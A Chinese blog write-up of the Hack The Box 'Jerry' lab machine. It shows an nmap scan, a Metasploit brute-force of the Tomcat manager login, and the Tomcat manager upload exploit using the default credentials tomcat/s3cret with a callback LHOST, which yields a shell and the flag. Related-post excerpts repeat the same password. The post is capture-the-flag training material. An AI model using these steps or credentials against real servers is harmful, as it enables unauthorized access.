hack the box jerry靶机

最新推荐文章于 2024-05-14 11:40:31 发布
最新推荐文章于 2024-05-14 11:40:31 发布
阅读量926 收藏
点赞数
分类专栏: heck the box 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zr1213159840/article/details/124179839
版权

打开靶机,扫一下看看有什么东西。能看到是存在一个8080端口,tomcat,apache等信息

nmap -sV -Pn -A 10.10.10.95

在这里插入图片描述
这个机器给了提示,说什么远程命令执行,什么文件上传之类的。我感觉使用msf或许可以。于是打开msf进去搜索了一下。能看到确实有上传相关的漏洞。

search apache tomcat

在这里插入图片描述
这下好了,直接利用就好了,哈哈哈哈。
首先配置远程主机为10.10.10.95,配置远程端口为8080,然后直接run!不出意外直接没用,非常尴尬。
在这里插入图片描述
接着看了一下漏洞的options的选项,能发现端口后面有一个manager页面,尝试打开发现需要用户名和密码。
在这里插入图片描述
在这里插入图片描述
通过搜索发现是存在一些弱口令的,但是手动输了一些都没用,那怎么办呢?
然后就搜tomcat_mgr等相关的信息,发现msf存在一个爆破的功能。上去爆破。
首先搜索mgr_login

search mgr_login

在这里插入图片描述
直接使用这个漏洞,查看下options要配置啥玩意
在这里插入图片描述
需要配置远程的主机以及远程的端口,配置即可。端口默认的8080是对的,不用修改,然后直接run

set RHOSTS 10.10.10.95

在这里插入图片描述
跑了一会发现爆破成功一个
在这里插入图片描述
接着回去利用那个上传漏洞,但是记得配置好账号密码

set RHOSTS 10.10.10.95
set RPORT 8080
set httpPassword s3cret
set Httpusername tomcat
set LHOST 10.10.14.30

在这里插入图片描述
然后直接开run,拿到windows主机的权限
在这里插入图片描述
仔细翻找后,能在User/administrator/desktop/flags下面找到flag
在这里插入图片描述

铁锤2号
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hackthebox-Jerry(考点:tomcat安全/windows)
冬萍子癸水
04-16 405
nmap 就8080,扫描结果显示是tom猫 网上有很多方法,把tom猫按在地上摩擦。。。这个 先传统方法。进去,上传 dirbuster搜到manager登录页面 不知道密码,那么想法找密码,但是如果此时点了取消登录框cancel,密码就自动出来了。。。。。。。。额 或者kali自带的破解tom的字典,在这里 然后用这个小脚本自动跑 #!/usr/bin/env python impor...
Hackthebox------Jerry
大方子
11-24 3014
hackthebox网站:https://www.hackthebox.eu   这次我们的靶机叫-Jerry IP:10.10.10.95   ====================================================================================== 1.先用nmap对 目标靶机进行扫描 nmap -sC -sV...
HackTheBox::Jerry
aya3t的博客
10-12 189
HackTheBox::Jerry
[Hack The Box]靶机4 Jerry
Huamang的博客
03-29 501
首先用nmap进行端口扫描,看到只开启了8080端口,是Tomcat 给出的是默认界面 dirmap扫描了一下目录 去manager管理页面看看,他需要认证 他提示密码为s3cret,试了一下真是这个,倒省事了,不用我自己爆破 进tomcat的后台就好弄了哦,getshell方法多的是,这里写的挺多的,这里我选择直接用是msf打,方便点 use exploit/multi/http/tomcat_mgr_upload 直接打通 在Administrator的桌面发现flag cd C:.
Hack the box靶机 Jerry
菜浪马废的博客
05-27 361
需要账户 ??????? 老子就点了个取消 你把密码都给我了? tomcat:s3cret 登录完还是这个 再找找其他的 /manage可以登录进来 可以上传文件 需要点一下我上传的shell 才能连接 查看有空格的文件名的时候 用“”把文件名括起来就可以查看了 白天不知道因为什么心烦 没怎么学习 随便翻了翻linux的缓冲区 还有一个htb上win的简单的题 还得努力啊 离着月薪三万还差得远呢 加油! ...
HackTheBox靶机系列之困难Reel
04-09
主要介绍Reel靶机得整个利用过程
Hack the box的Easy难度比较有价值的靶机.rar
11-04
Hack the box的Easy难度比较有价值的靶机.rar
hack me please靶机攻略.docx
10-19
hack me please靶机攻略.docx
OWASP靶机安全学习、测试
05-24
这里提供的是owasp靶机的下载,下载后直接在虚拟机导入即可使用 OWASP靶机是一个开放式Web应用程序安全项目组织,旨在帮助计算机和互联网应用程序提供公正、实际、有成本效益的信息。在信息安全中OWASP TOP 10 是...
PWN靶机环境 网络安全
05-23
PWN靶机环境
Hackthebox:Jerry Walkthrough(not use metasploit)
汗的博客
12-19 656
Jerry是一个Windows系统的Hackthebox靶机,主要和tomcat有关,本walkthrough未使用msf
jerry yue_如何从hackthebox入侵jerry
weixin_26636643的博客
09-27 527
jerry yue 介绍 (Introduction) Welcome to my third article. Today we will be looking at Jerry from HackTheBox. This is a realistic and very easy box. The article will again be similar to my first and sec...
HackTheBox-Lame&Jerry渗透测试
weixin_43111940的博客
04-13 185
Lame 端口扫描 sudo nmap -sC -sV -p 21,22,139,445,3632 10.10.10.3 发现了ftp和smb服务 匿名登录一下ftp 没有什么东西 查找smb服务的exp searchslpoit smb 这里可以用msf打 由于在OSCP的进攻方认证考试中只允许对一台主机用msf,所以在测试的时候尽量避免用msf(直接用msf很low) 用的是distccd的脚本,搜索distccd exploit 找到对应的脚本 https://gist.github.co
No.60-HackTheBox-windows-Jerry-Walkthrough渗透学习
qq_34801745的博客
02-25 310
** HackTheBox-windows-Jerry-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/144 靶机难度:初级(4.0/10) 靶机发布日期:2018年11月11日 靶机描述: Although Jerry is one of the easier machines on Hack The Bo...
Hack The Box】windows练习-- jerry
人间体佐菲的博客
10-31 174
Hack The Box】windows练习-- jerry
PHP开发的医院安全(不良)事件系统源码 医院不良事件有哪些?又该怎样分类呢?也许这篇文章能给予你答案。
最新发布
爱笑的源码博客
05-14 972
医疗安全不容忽视! 医疗不良事件有哪些?又该怎样分类呢?也许这篇文章能给予你答案。
地埋式可燃气体监测终端,地下燃气管网安全“哨兵”
SUNVUA1028的博客
05-10 332
在现代都市的繁华之下,一条条地下燃气管网承载着城市的生命与活力,但管网老化腐蚀,第三方施工破坏,巡检维修不到位等问题,时刻影响着燃气管网安全运行,甚至威胁人民群众的生命财产安全。在这个快速发展的时代,旭华智能埋地式激光可燃气体监测仪,就像燃气管网卫士,时刻守护燃气管网安全,守护人民生命健康和财产安全,为城市的安全发展贡献力量。除监测可燃气体浓度外,还能监测水浸、温度、压力等多种参数,高度集成一体化设计,节省空间的同时,也提升了设备的实用性和便捷性。旭华智能多年来致力于燃气物联网监测领域,自主研发的。
提高岩土工程安全的关键:锚索测力计的应用
yousino1的博客
05-10 211
通过实时监控数据,工程师能够及时发现锚索力量的异常变化,并迅速采取补强措施,成功避免了一次可能的边坡滑坡,确保了施工安全和道路使用的安全。在众多技术和工具中,锚索测力计的应用在提高岩土工程的安全性方面发挥了不可替代的作用。- 坡面和边坡稳定:在施工或自然斜坡可能出现滑移的情况下,通过预应力锚索将斜坡加固,并使用锚索测力计监控锚索的实时力量,及时调整预应力,以防止坡面滑移。锚索测力计作为岩土工程中一项重要的监测工具,随着技术的不断进步,其应用将更加广泛,对保障工程结构的稳定性和安全性具有重大意义。
针对 % 号 | 引起的 不安全情况
m0_74381444的博客
05-11 958
%%%%%%
hack the box three
07-28
回答: 根据提供的引用内容,我了解到"Hack The Box"是一个在线平台,提供了一系列的虚拟机供用户进行渗透测试和漏洞利用的训练。根据引用\[1\]中的信息,可能涉及到nmap扫描、访问靶机地址、查看/etc/hosts、使用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值